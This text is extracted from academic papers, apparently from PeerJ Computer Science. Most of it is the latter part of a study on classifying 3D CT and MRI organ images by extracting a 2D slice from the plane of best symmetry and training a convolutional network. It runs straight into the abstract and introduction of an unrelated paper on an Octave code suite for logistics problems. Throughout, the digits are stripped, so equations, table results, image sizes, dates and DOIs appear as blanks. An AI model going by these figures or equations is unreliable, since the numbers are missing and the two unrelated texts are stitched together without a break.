a limitation of conventional classification methods such as these, is that the most appropriate features for a given problem have to be extracted first, in order to train the classifiers. in contrast, deep learning techniques such as deep convolutional neural networks (dcnns) extract the features as part of the learning process, thereby ensuring that the optimal features for a given task are extracted. a d dcnn was used by ahn ( ) to classify lung cancer (cancer positive or negative) from ct images. the author modified the squeezenet (iandola et al., ) architecture (which is traditionally suitable for d images) to obtain squeezenet d which is appropriate for d image classification. liu & kang ( ) introduced a lung nodule classification approach by using a multi- view dcnn for ct images. they obtained a d volume by considering multiple views of a given nodule (patches of different sizes around the nodule) prior to classification. they performed two classifications: binary (benign or malignant) and ternary (benign, primary malignant, or metastatic malignant). jin et al. ( ) modified the alexnet (krizhevsky, sutskever & hinton, ) architecture to make it suitable for the classification of d ct images of lungs. they segmented the lungs from the ct image using a pre-processing step and performed a binary classification (cancer or not) on the resulting image. instead of using d dcnns, other researchers have considered how d dcnns can be used to classify d medical images. for example, qayyum et al. ( ) used each and every d slice of a d image islam et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. as input to a d dcnn. they classified the images into classes and used a publicly available d medical image database to evaluate their methodology. usually d medical images are captured/reconstructed so that they are consistent with respect to viewing direction and patient orientation (rotation and translation). for example, image slices are typically taken in the superior-inferior direction. an effort is made to ensure that the patient is aligned in such a way that the mid-sagittal and mid-coronal planes are aligned at the middle of the image. thus, most classification methods assume that these requirements are met (e.g., qayyum et al., ). as such, they may not perform well if these assumptions are violated. others perform manual pre-processing prior to the classification to avoid this issue (e.g., liu & dellaert, ). in this paper, we consider the specific case of d organ image classification and propose an algorithm that is robust against rotation and translation. to this end, we exploit the fact that the human body is roughly symmetric, and extract a d slice from the plane of best symmetry from a d image of the organ in a pre-processing step. we consider this slice to be representative of the d image, as it provides a relatively consistent cross-section of the d image, irrespective of its orientation. then, we use this ‘representative’ d image to train a d dcnn to classify the d image. as discussed later, simplicity is one of the major features of the algorithm we propose. 
we show through experiments performed on publicly available muliti-modal (ct and mri) data that ( ) the proposed method is as accurate as other similar methods when the above assumptions are met, ( ) it significantly outperforms other methods when faced with rotated and/or translated data, ( ) the training time of the proposed method is low, and ( ) it achieves similarly high results when used with other dcnn architectures. materials and methods in this section, we discuss the steps of the algorithm we propose for rotation and translation invariant d organ image classification: volume reconstruction, segmentation, symmetry plane extraction, and classification using a dcnn. volume reconstruction first, we loaded the d slices of a dicom image into a d array considering the instancenumber in the metadata to be the z dimension. as the slice thickness (z spacing) is not necessarily the same as the pixel spacing, this volume does not represent the real-world shape of the imaged organ/body part. to retain the actual shape, we resampled the d image using cubic interpolation (miklos, ). the new array size for the resampled image was calculated using eq. ( ) where [nx,ny,nz] is the original array size, psx and psy are the x and y spacings respectively (pixelspacing in metadata), and st is the z spacing (slicethickness in metadata). an example of a volume reconstruction is shown in fig. . [nx,ny,nz]= [ nx, ny∗psy psx , nz ∗st psx ] ( ) islam et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure volume reconstruction from dicom images: (a) stack of d slices, (b) reconstructed d volume, and (c) resampled d volume. full-size doi: . /peerjcs. /fig- figure multi-level volume thresholding: (a) resampled volume from the previous step, (b) seg- mented volume, and (c) resulting point cloud. full-size doi: . /peerjcs. /fig- d volume segmentation to segment the organ(s) from the background, we used a multi-level global thresholding using otsu’s method (otsu, ). we used two thresholds and considered the voxels with intensity values within these thresholds to be the organ(s). this provides a segmentation (point cloud) of the organ(s) and also avoids the inclusion of possible imaging artifacts at the extremes of the intensity spectrum. an example of the segmentation process is shown in fig. . note that this is a simple segmentation process, and as such, does not provide an exact segmentation. however, from our results, we observed that this was sufficient for our purpose: simplifying the symmetry plane calculation in the next step of our algorithm. representative d image extraction we calculated the plane of best symmetry from the point cloud resulting from the previous step using the method discussed in cicconet, hildebrand & elliott ( ). they calculated islam et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure representative d image extraction: (a) segmented volume, (b) segmented point cloud with the plane of best symmetry shown as a circular plane, and (c) d image extracted from the symmetry plane. full-size doi: . /peerjcs. /fig- the reflection of a point cloud around an arbitrary plane, used the iterative closest point algorithm (besl & mckay, ) to register the original and reflected point clouds, and solved an eigenvalue problem related to the global transformation that was applied to the original data during registration. 
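a minimal octave/matlab sketch of the volume-reconstruction step above, using the array-size rule of eq. ( ) and cubic interpolation; the stand-in volume and the spacing values are illustrative only, and in practice v would be assembled from the dicom slices ordered by instancenumber:

% V: volume assembled by stacking the 2D DICOM slices (stand-in data used here).
V   = rand(256, 256, 40);            % illustrative volume of size [nx ny nz]
psx = 0.70;  psy = 0.70;  st = 2.5;  % PixelSpacing (x, y) and SliceThickness in mm (illustrative)

[nx, ny, nz] = size(V);
newSize = round([nx, ny * psy / psx, nz * st / psx]);   % Eq. (1): array size of the resampled volume

% Query grids over the original index ranges, then cubic interpolation via interp3.
[Xq, Yq, Zq] = meshgrid(linspace(1, ny, newSize(2)), ...
                        linspace(1, nx, newSize(1)), ...
                        linspace(1, nz, newSize(3)));
Vres = interp3(V, Xq, Yq, Zq, 'cubic');                 % resampled volume with real-world proportions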
the first eigenvector in this solution is the normal to the plane of best symmetry. we extracted the d image resulting from the intersection of this plane with the d volume using the nearest neighbour method (miklos, ). we considered the second and third eigenvectors to be the x and y axes for this d image respectively. we determined the bounds of the d image to be the minimum and maximum values resulting from the projections of the d volume vertices on the axes and the origin to be the middle of these minimum and maximum values. figure shows the extraction of the plane of best symmetry. although the accuracy of the symmetry plane calculation depends on the segmentation step, and this can be avoided by using algorithms that minimize the distance between intensity values of voxels (tuzikov, colliot & bloch, ; teverovskiy & li, ) instead, using the segmented point cloud is more efficient. as we found it is sufficient for our purposes, we used this method of symmetry plane calculation for the sake of efficiency. classification using a dcnn due to the roughly symmetric nature of the human body, the d images resulting from the previous step provide relatively consistent cross-sections of the d images. as such, we used these d images to train a standard d dcnn for the classification task. the dcnn used here consisted of layers: one image input layer, four convolution layers, four batch normalization layers, four rectified linear unit (relu) (nair & hinton, ) layers, four max poling layers, one fully connected layer, one softmax layer, and one classification output layer. we resized the images to the size of × and normalized the intensity values to be in the range of [ ]. figure illustrates the dcnn architecture. islam et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure deep convolutional neural network architecture. full-size doi: . /peerjcs. /fig- results in this section, we discuss the performance metrics and databases used in the experiments, the implementation/extension of existing methods, and the experimental results. all experiments were performed in matlab r© (mathworks inc., ) on a hp z g workstation running windows r© education on an intel r© xeon r© silver cpu with a clock speed of . ghz, gb ram, and a nvidia r© quadro r© p gpu. performance evaluation metrics to evaluate classification performance, we used commonly utilized metrics (accuracy and mean value of sensitivity, specificity, precision, f-measure, and g-mean) (japkowicz, ; powers, ; olson & delen, ). these metrics are defined in eqs. ( )–( ) with respect to values of the confusion matrix: true positives (tp), true negatives (tn), false positives (fp), and false negatives (fn). accuracy = tp+tn tp+fn +fp+tn ( ) sensitivity = tp tp+fn ( ) specificity = tn tn +fp ( ) precision = tp tp+fp ( ) f−measure = × ( tp tp+fp × tp tp+fn tp tp+fp + tp tp+fn ) ( ) g−mean = √ tp tp+fn × tn tn +fp ( ) islam et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure database formation. full-size doi: . /peerjcs. /fig- databases we collected data from a publicly available d medical image database for our experiments: the cancer imaging archive (tcia) (clark et al., ). tcia stores a large number of multi-modal medical images stored in the digital imaging and communications in medicine (dicom) file format. 
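the evaluation metrics above are simple functions of the confusion-matrix counts; a short octave/matlab restatement follows (computed per class, with the reported values being means over classes; the counts below are illustrative):

% Illustrative confusion-matrix counts for one class.
tp = 42; tn = 120; fp = 5; fn = 3;

accuracy    = (tp + tn) / (tp + fn + fp + tn);
sensitivity = tp / (tp + fn);                 % recall / true positive rate
specificity = tn / (tn + fp);                 % true negative rate
precision   = tp / (tp + fp);
f_measure   = 2 * (precision * sensitivity) / (precision + sensitivity);
g_mean      = sqrt(sensitivity * specificity);

fprintf('acc %.3f  sens %.3f  spec %.3f  prec %.3f  f %.3f  g %.3f\n', ...
        accuracy, sensitivity, specificity, precision, f_measure, g_mean);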
from this database, we collected data (ct and mri) for four classes that define different areas of the human body: head, thorax, breast, and abdomen. some images, such as those that had a very low number of d dicom slices and those with inconsistent imaging directions, were removed from our database. a total of d images were obtained ( images per class). seventy percent of the images were used for training and the remaining thirty percent were used for testing. in addition to the original testing database, we created two other databases by ( ) randomly rotating and translating and ( ) randomly swapping the axes of the original test data. the former database was used to test for rotation and translation (patient orientation) invariance and the latter was used to test for robustness against changes in the imaging direction. in addition to this, we created an augmented training database by randomly rotating and translating % of the original training data, and randomly swapping axes of the remaining %. figure illustrates this process. to generate the transformed data that simulated changes in patient orientation (in the transformed test database and the augmented training database), we performed a random rotation in the range of [− ] with respect to the three coordinate axes and a random translation of [− ] along the coordinate axes on each image. figure shows an example of such a d transformation. to obtain the axis swapped data that simulated changes in imaging direction (in the axis swapped test database and the augmented training database), we randomly changed the axes of the original data. note that this is synonymous to rotations of around the x, y, or z axis. an example of a random axis swapping is shown in fig. . islam et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure an example of a random d transformation: (a) original volume, (b) transformed volume (a rotation of + counterclockwise around the z axis and a translation of [ , , ] in the x, y, and z di- rection respectively), and (c) mid-axial slices of both original and transformed volumes. full-size doi: . /peerjcs. /fig- figure an example of a random d axis swapping: (a) original volume, (b) axis swapped volume with the x axis changed to the y axis and z axis changed to the x axis, and (c) mid-axial slices of both original and axis swapped volumes. full-size doi: . /peerjcs. /fig- performance comparison with other similar methods we evaluated our method against similar existing methods. we reimplemented the method of qayyum et al. ( ) that used all d slices to represent the d volume. we implemented their dcnn in matlab and used all slices of the training and testing sets respectively to train and evaluate this method. as the authors used images of size × as their input, we also performed the same resizing of the data in a pre-processing step. we also implemented the method used in the classification of d lung images introduced in jin et al. ( ). they used thresholds based on the hounsfield unit (hu) to extract an initial mask from ct images and used morphological operations to fill holes in this mask. then, they segmented the lungs using this mask and trained a dcnn for the classification task. however, this method cannot be directly used in our problem. first, we have multi-modal data, and hence, it is not possible to use the hu scale, which is specific to ct images. 
second, we have images of different organs which would require the definition of organ specific thresholds. third, morphological operations require the input of the size of dilation/erosion which varies depending on the type of image. islam et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table performance comparison with similar existing methods (without data augmentation). best performance per metric per database is highlighted in bold. database methodology accuracy sensitivity specificity precision f-measure g-mean jin et al. ( ) . . . . . . qayyum et al. ( ) . . . . . . prasoon et al. ( ) . . . . . . ahn ( ) . . . . . . original proposed . . . . . . jin et al. ( ) . . . . . . qayyum et al. ( ) . . . . . . prasoon et al. ( ) . . . . . . ahn ( ) . . . . . . transformed proposed . . . . . . jin et al. ( ) . . . . . . qayyum et al. ( ) . . . . . . prasoon et al. ( ) . . . . . . ahn ( ) . . . . . . axis swapped proposed . . . . . . therefore, we used a process that can be generally applied to all images in our database. first, we created a binary mask using the multi-level global thresholding method discussed earlier. then, we used active contours introduced in chan & vese ( ) on the initial mask with iterations to fill in holes and obtain a more refined mask. finally, we extracted the organ from the background using this mask and used this as the input to the dcnn. jin et al. ( ) observed that an input image size of × × provided the best performance, and therefore, we also resized the input images to this size. another d medical image classification model we implemented was ahn ( ) which was used for lung image classification. the author performed an intensity normalization of their ct images based on the hu scale in a pre-processing step. due to the same reasons as above, we did not perform this normalization. we used the same resizing of the data they used ( × × ) in our implementation. as an additional method of comparison, we extended the idea presented in prasoon et al. ( ) for image segmentation, to make it applicable to our problem. they explored the classification of each voxel in d mri images for the purpose of knee cartilage segmentation. they extracted three d patches around a voxel in the x, y, and z directions, trained dcnns for each d patch, and combined the results of the three dcnns in the final layer. we applied this idea to our problem by extracting the mid slices in the three coordinate directions and training three dcnns similar to theirs. performance comparisons with respect to the metrics discussed above when trained on the original and augmented training datasets are shown in tables and respectively. performance with regards to training time is given in table . figure shows the islam et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table performance comparison with similar existing methods (with data augmentation by random transformation and axis swapping on training data). best performance per metric per database is highlighted in bold. database methodology accuracy sensitivity specificity precision f-measure g-mean jin et al. ( ) . . . . . . qayyum et al. ( ) . . . . . . prasoon et al. ( ) . . . . . . ahn ( ) . . . . . . original proposed . . . . . . jin et al. ( ) . . . . . . qayyum et al. ( ) . . . . . . prasoon et al. ( ) . . . . . . ahn ( ) . . . . . . transformed proposed . . . . . . 
jin et al. ( ) . . . . . . qayyum et al. ( ) . . . . . . prasoon et al. ( ) . . . . . . ahn ( ) . . . . . . axis swapped proposed . . . . . . table comparison of training time with similar existing methods. method pre-processing time (m) training time (m) total time (m) jin et al. ( ) qayyum et al. ( ) n/a prasoon et al. ( ) ahn ( ) proposed classification of some random examples using the proposed method, along with corresponding confidence levels. performance when used with other dcnns we also investigated the performance of our method when used with some existing state- of-the-art dcnns: alexnet (krizhevsky, sutskever & hinton, ), googlenet (szegedy et al., ), resnet- (he et al., ), and vgg- (simonyan & zisserman, ). to enable these dcnns to be used in our algorithm, we normalized the d images (extracted from the plane of best symmetry) prior to the classification depending on the requirements of each dcnn. the single channel d grey scale images were converted to three-channel colour images and resized to the size of × × for alexnet and × × for googlenet, resnet- , and vgg- . the performance results are shown in table . performance when used with conventional classifiers as conventional classification approaches, in concert with image feature extraction methods, have been used extensively for image classification, we also explored how to integrate the concepts discussed here with these methods. for this purpose, we used two islam et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure performance (confidence level of classification) of the proposed method with respect to some random images: (a) abdomen, . %, (b) abdomen, . %, (c) abdomen, . %, (d) head, . %, (e) head, %, (f) head, . %, (g) breast, %, (h) breast, %, (i) breast, %, (j) thorax, . %, (k) thorax, . %, and (l) thorax, . %. the images show the views extracted using the pro- posed algorithm from d ct and mri images in the test databases. note that the differences in the im- ages of the same class are caused by the simplicity of the segmentation method which influences the symmetry plane extraction. full-size doi: . /peerjcs. /fig- table performance of the proposed algorithm when used with other state-of-the-art dcnn models. database methodology accuracy sensitivity specificity precision f-measure g-mean alexnet . . . . . . googlenet . . . . . . resnet- . . . . . . original vgg- . . . . . . alexnet . . . . . . googlenet . . . . . . resnet- . . . . . . transformed vgg- . . . . . . alexnet . . . . . . googlenet . . . . . . resnet- . . . . . . axis swapped vgg- . . . . . . image feature extraction methods: bag of words (bow) (harris, ) and histogram of oriented gradients (hog) (dalal & triggs, ). to perform the classification task, we used support vector machines (svms) and artificial neural networks (anns) as they are widely used in classification. here we used five-fold cross-validation for the svm and hidden neurons for the ann. we normalised the d image slices resulting from the symmetry plane calculation to the size of × . the performance of these approaches is shown in table . discussion from the results in table , we observe that the proposed method is better than other similar methods (except for ahn ( ) which shows slightly better performance) when islam et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. 
table performance of the proposed algorithm when used with conventional machine learning approaches. database methodology accuracy sensitivity specificity precision f-measure g-mean bow+svm . . . . . . bow+ann . . . . . . hog+svm . . . . . . original hog+ann . . . . . . bow+svm . . . . . . bow+ann . . . . . . hog+svm . . . . . . transformed hog+ann . . . . . . bow+svm . . . . . . bow+ann . . . . . . hog+svm . . . . . . axis swapped hog+ann . . . . . . applied to data that satisfied the conditions of consistent patient orientation and imaging direction when trained on the original (unaugmented) training database. however, ahn ( ) uses d dcnns in their classification and therefore, has a much slower training time when compared to the proposed method. as shown in table , even with a relatively higher pre-processing time, our method is the fastest in terms of total training time. also from table , we can see that the proposed method outperforms the other methods in the face of changes in patient orientation and imaging direction. although observe that some methods such as ahn ( ) and prasoon et al. ( ) are robust against patient orientation to some degree, they also fail when dealing with changes to imaging direction. performance of the compared methods on transformed and axis swapped data is improved when trained on augmented data, as seen in table . this is the result of the classifiers being trained on images of different orientations. however, the proposed method outperforms the other methods even when training was performed on augmented data. also, the results imply that data augmentation in the training phase is not required for our method. the high accuracy of the proposed method, specifically on transformed data, is mainly due to the fact that a relatively consistent d cross-sectional view of a d image is being used to represent the d image irrespective of orientation. as such, the variation in the input data per class is minimal and therefore, better classification can be achieved. comparison results shown in table reflect the robustness of the proposed method irrespective of the dcnn architecture used in the classification step. the performance results of the classifiers svm and ann, when combined with the feature extraction methods of bow and hog, show consistent but lower results (table ). this indicates that dcnns may be better suited for our application. the salient feature of this algorithm is its simplicity. first, we reduced the d classification problem to a d one by extracting the d image lying on the plane of best symmetry from the d volume. in this operation, we used calculations that were most efficient, such as simple thresholding techniques. it can be argued that using more sophisticated methods islam et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. of segmentation would enable more accurate symmetry plane calculation, which in turn would make the d views extracted more consistent. furthermore, we rescaled the data to an -bit representation (intensity range of [ ]), thereby reducing the resolution of the data. however, we found that even in the face of such simplifications, the proposed method displayed very high levels of performance. as such, we can conclude that it has achieved a good balance between efficiency and accuracy. although the human body is roughly symmetric, most of the organs and how they are aligned inside the body are not perfectly symmetrical. 
furthermore, the data we considered here was from a cancer database where there is further asymmetry caused by tumors, lesions etc. our method was observed to perform well in these circumstances. however, we did not consider the effect of more exaggerated forms of asymmetry, for example, that caused by parts of an organ being cut off due to improper patient alignment. in the future, we will investigate how these forms of asymmetry affect the proposed method and how to compensate for them. we will also explore how it performs on other databases with higher numbers of classes. conclusion in this paper, we proposed a d organ image classification approach which is robust against patient orientation and changes in imaging direction. to this end, we extracted the plane of best symmetry from the d image and extracted the d image corresponding to that plane. then, we used a dcnn to classify the d image into one of four classes. we showed that this method is not only efficient and simple, but is also highly accurate in comparison to other similar methods. we also showed that this algorithm can be used in concert with other state-of-the-art dcnn models and also conventional classification techniques in combination with feature extraction methods. although our algorithm was specifically developed for d organ image classification, it is applicable to any classification task where a d image extracted from the plane of best symmetry of the d image is sufficient to represent the d image. acknowledgements the authors would like to thank dr. bridget copson of the department of medical imaging at st. vincent’s hospital, melbourne, australia, for her input on imaging techniques. additional information and declarations funding this work was supported by the university of melbourne under the melbourne research scholarship (mrs). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: university of melbourne. islam et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. competing interests the authors declare there are no competing interests. author contributions • kh tohidul islam and sudanthi wijewickrema conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. • stephen o’leary conceived and designed the experiments, contributed reagents/ma- terials/analysis tools, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: the code is available in the supplemental information . supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references ahn bb. . the compact d convolutional neural network for medical images. stanford: standford university. arias j, martínez-gómez j, gámez ja, de herrera ags, müller h. . medical image modality classification using discrete bayesian networks. computer vision and image understanding : – doi . /j.cviu. . . . besl p, mckay nd. . a method for registration of -d shapes. ieee transactions on pattern analysis and machine intelligence ( ): – doi . / . . bicacro e, silveira m, marques js. . 
alternative feature extraction methods in d brain image-based diagnosis of alzheimer’s disease. in: th ieee international conference on image processing. piscataway: ieee doi . /icip. . . chan t, vese l. . active contours without edges. ieee transactions on image processing ( ): – doi . / . . cicconet m, hildebrand dgc, elliott h. . finding mirror symmetry via reg- istration and optimal symmetric pairwise assignment of curves. in: ieee international conference on computer vision workshops (iccvw). piscataway: ieee doi . /iccvw. . . clark k, vendt b, smith k, freymann j, kirby j, koppel p, moore s, phillips s, maffitt d, pringle m, tarbox l, prior f. . the cancer imaging archive (tcia): maintaining and operating a public information repository. journal of digital imaging ( ): – doi . /s - - - . cui x, liu y, shan s, chen x, gao w. . d haar-like features for pedestrian detection. piscataway: ieee doi . /icme. . . islam et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /j.cviu. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /icip. . http://dx.doi.org/ . / . http://dx.doi.org/ . /iccvw. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /icme. . http://dx.doi.org/ . /peerj-cs. dalal n, triggs b. . histograms of oriented gradients for human detection. in: ieee computer society conference on computer vision and pattern recognition (cvpr’ ), volume . piscataway: ieee, – doi . /cvpr. . . harris zs. . distributional structure. word ( – ): – doi . / . . . he k, zhang x, ren s, sun j. . deep residual learning for image recognition. in: ieee conference on computer vision and pattern recognition (cvpr). piscataway: ieee doi . /cvpr. . . iandola fn, han s, moskewicz mw, ashraf k, dally wj, keutzer k. . squeezenet: alexnet-level accuracy with x fewer parameters and < . mb model size. arxiv preprint. arxiv: . . japkowicz n. . why question machine learning evaluation methods. in: aaai workshop on evaluation methods for machine learning. new york: acm, – . jin t, cui h, zeng s, wang x. . learning deep spatial lung features by d convo- lutional neural network for early cancer detection. in: international conference on digital image computing: techniques and applications (dicta). piscataway: ieee doi . /dicta. . . krizhevsky a, sutskever i, hinton ge. . imagenet classification with deep convolutional neural networks. in: pereira f, burges cjc, bottou l, weinberger kq, eds. advances in neural information processing systems . lake tahoe: curran associates, inc., – . kumar a, kim j, cai w, fulham m, feng d. . content-based medical image retrieval: a survey of applications to multidimensional and multimodality data. journal of digital imaging ( ): – doi . /s - - - . liu k, kang g. . multiview convolutional neural networks for lung nodule clas- sification. international journal of imaging systems and technology ( ): – doi . /ima. . liu y, dellaert f. . a classification based similarity metric for d image re- trieval. in: proceedings. ieee computer society conference on computer vi- sion and pattern recognition (cat. no. cb ). piscataway: ieee, – doi . /cvpr. . . mathworks, inc. . matlab. natick: mathworks, inc. available at https://www. mathworks.com/products/matlab.html. miklos p. . image interpolation techniques. in: nd siberian-hungarian joint symposium on intelligent systems. 
mohan g, subashini mm. . mri based medical image analysis: survey on brain tumor grade classification. biomedical signal processing and control : – doi . /j.bspc. . . . morgado p, silveira m, marques js. . diagnosis of alzheimer’s disease using d local binary patterns. computer methods in biomechanics and biomedical engineering: imaging & visualization ( ): – doi . / . . . islam et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /cvpr. . http://dx.doi.org/ . / . . http://dx.doi.org/ . /cvpr. . http://arxiv.org/abs/ . http://dx.doi.org/ . /dicta. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /ima. http://dx.doi.org/ . /cvpr. . https://www.mathworks.com/products/matlab.html https://www.mathworks.com/products/matlab.html http://dx.doi.org/ . /j.bspc. . . http://dx.doi.org/ . / . . http://dx.doi.org/ . /peerj-cs. nair v, hinton ge. . rectified linear units improve restricted boltzmann machines. in: proceedings of the th international conference on international conference on machine learning, icml’ . madison: omnipress, – . olson dl, delen d. . advanced data mining techniques. springer, berlin, heidel- berg: springer science & business media doi . / - - - - . otsu n. . a threshold selection method from gray-level histograms. ieee transac- tions on systems, man, and cybernetics ( ): – doi . /tsmc. . . Öziç mÜ, Özşen s. . t-test feature ranking based d mr classification with vbm mask. in: th signal processing and communications applications conference (siu). piscataway: ieee doi . /siu. . . powers dm. . evaluation: from precision, recall and f-measure to roc, in- formedness, markedness and correlation. journal of machine learning technologies ( ): – . prasoon a, petersen k, igel c, lauze f, dam e, nielsen m. . deep feature learning for knee cartilage segmentation using a triplanar convolutional neural network. in: advanced information systems engineering. springer, berlin, heidelberg: springer berlin heidelberg, – doi . / - - - - _ . qayyum a, anwar sm, awais m, majid m. . medical image retrieval using deep convolutional neural network. neurocomputing : – doi . /j.neucom. . . . research and markets. . medical imaging market—global outlook and forecast – . available at https://www.researchandmarkets.com/reports/ / (accessed on october ). simonyan k, zisserman a. . very deep convolutional networks for large-scale image recognition. arxiv preprint. arxiv: . . szegedy c, liu w, jia y, sermanet p, reed s, anguelov d, erhan d, vanhoucke v, rabinovich a. . going deeper with convolutions. in: ieee con- ference on computer vision and pattern recognition (cvpr). piscataway: ieee doi . /cvpr. . . teverovskiy l, li y. . truly d midsagittal plane extraction for robust neuroimage registration. in: rd ieee international symposium on biomedical imaging: macro to nano, . piscataway: ieee, – doi . /isbi. . . tuzikov av, colliot o, bloch i. . evaluation of the symmetry plane in d mr brain images. pattern recognition letters ( ): – doi . /s - ( ) - . zhou x, hayashi t, hara t, fujita h, yokoyama r, kiryu t, hoshi h. . automatic segmentation and recognition of anatomical lung structures from high-resolution chest ct images. computerized medical imaging and graphics ( ): – doi . /j.compmedimag. . . . islam et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / - - - - http://dx.doi.org/ . /tsmc. . http://dx.doi.org/ . /siu. . http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /j.neucom. . . 
https://www.researchandmarkets.com/reports/ / http://arxiv.org/abs/ . http://dx.doi.org/ . /cvpr. . http://dx.doi.org/ . /isbi. . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /j.compmedimag. . . http://dx.doi.org/ . /peerj-cs. development of a coded suite of models to explore relevant problems in logistics development of a coded suite of models to explore relevant problems in logistics santiago-omar caballero-morales postgraduate department of logistics and supply chain management, universidad popular autonóma del estado de puebla, puebla, puebla, mexico abstract logistics is the aspect of the supply chain which is responsible of the efficient flow and delivery of goods or services from suppliers to customers. because a logistic system involves specialized operations such as inventory control, facility location and distribution planning, the logistic professional requires mathematical, technological and managerial skills and tools to design, adapt and improve these operations. the main research is focused on modeling and solving logistic problems through specialized tools such as integer programing and meta-heuristics methods. in practice, the use of these tools for large and complex problems requires mathematical and computational proficiency. in this context, the present work contributes with a coded suite of models to explore relevant problems by the logistic professional, undergraduate/postgraduate student and/or academic researcher. the functions of the coded suite address the following: ( ) generation of test instances for routing and facility location problems with real geographical coordinates; ( ) computation of euclidean, manhattan and geographical arc length distance metrics for routing and facility location problems; ( ) simulation of non- deterministic inventory control models; ( ) importing/exporting and plotting of input data and solutions for analysis and visualization by third-party platforms; and ( ) designing of a nearest-neighbor meta-heuristic to provide very suitable solutions for large vehicle routing and facility location problems. this work is completed by a discussion of a case study which integrates the functions of the coded suite. subjects algorithms and analysis of algorithms, computer education, databases, programming languages keywords facility location, vehicle routing, inventory management, metaheuristics, octave programming introduction research on supply chain (sc) management and logistics has been performed following quantitative (simulation, mathematical modeling and optimization) and qualitative (case study, interviews, empirical studies) approaches (sachan & datta, ). these approaches have been performed on the different logistic processes of the sc such as inventory control, transportation, production and distribution (lloyd et al., ; kuczyńska-chalada, furman & poloczek, ). transportation has been reported as the largest research topic in logistics (daugherty, bolumole & schwieterman, ). how to cite this article caballero-morales s-o. . development of a coded suite of models to explore relevant problems in logistics. peerj comput. sci. :e doi . /peerj-cs. submitted june accepted november published november corresponding author santiago-omar caballero-morales, santiagoomar.caballero@upaep.mx academic editor jingbo wang additional information and declarations can be found on page doi . /peerj-cs. copyright caballero-morales distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. 
mailto:santiagoomar.�caballero@�upaep.�mx https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ with the rise of industry . (which is associated to “internet of things” or “smart systems”) logistics faces the challenge to control all operations within enterprises cooperating in supply and logistic chains (kuczyńska-chalada, furman & poloczek, ). in this context, the use of (a) embedded systems and (b) intelligent systems are considered as vital resources to achieve smart and autonomous flow of raw materials, work-in-process, and distribution of end products throughout the sc in accordance to human planning (lloyd et al., ; kuczyńska-chalada, furman & poloczek, ). the development of intelligent systems is based on quantitative research as it involves optimization, mathematical modeling, simulation and statistical assessment. a key resource for these tasks is the availability of specialized data for analysis and testing. thus, research on state-of-the-art systems for transportation planning is supported by available databases of test sets (instances) such as tsplib (reinelt, , ) for the traveling salesman problem, cvrplib (uchoa et al., ; oliveira et al., ) for the vehicle routing problem, and sjc/p sets (chaves & nogueira-lorena, ; nogueira-lorena, ) for facility location problems. however, not all databases consider the different aspects of real logistics problems such as specific demand/location patterns and/or distance metrics. also, in practice, development and implementation of specific resources and solving methods are restricted by the required technical knowledge or proficiency associated to programing platforms and mathematical modeling. as presented in rao, stenger & wu ( ) the use of software programs, computer programing and spreadsheet modeling, are effective problem- solving tools within logistic education. hence, universities have revised their programs to provide qualified logistic professionals with these tools (erturgut, ). currently, there is an extensive portfolio of published educational resources for the logistic professional. for example, within the field of inventory control, the use of simulation software has been used with positive results (al-harkan & moncer, ; carotenuto, giordani & zaccaro, ). for vehicle routing and facility location problems, software such as vrp spreadsheet solver and the flp spreadsheet solver (which can solve problems with up to and customers respectively) (erdogan, a, b) can be effectively used for application and teaching purposes. while the methodological steps to use these tools are frequently reported within the respective literature (i.e., manuals, published articles), source data such as programing code and data sets is not explicitly or publicly available for sharing. also, license restrictions regarding the implementation software avoids the use of some simulation models for commercial purposes. the high costs of some of these licenses restrict their use by freelance professionals, micro, small and medium enterprises, which have limited economic resources. 
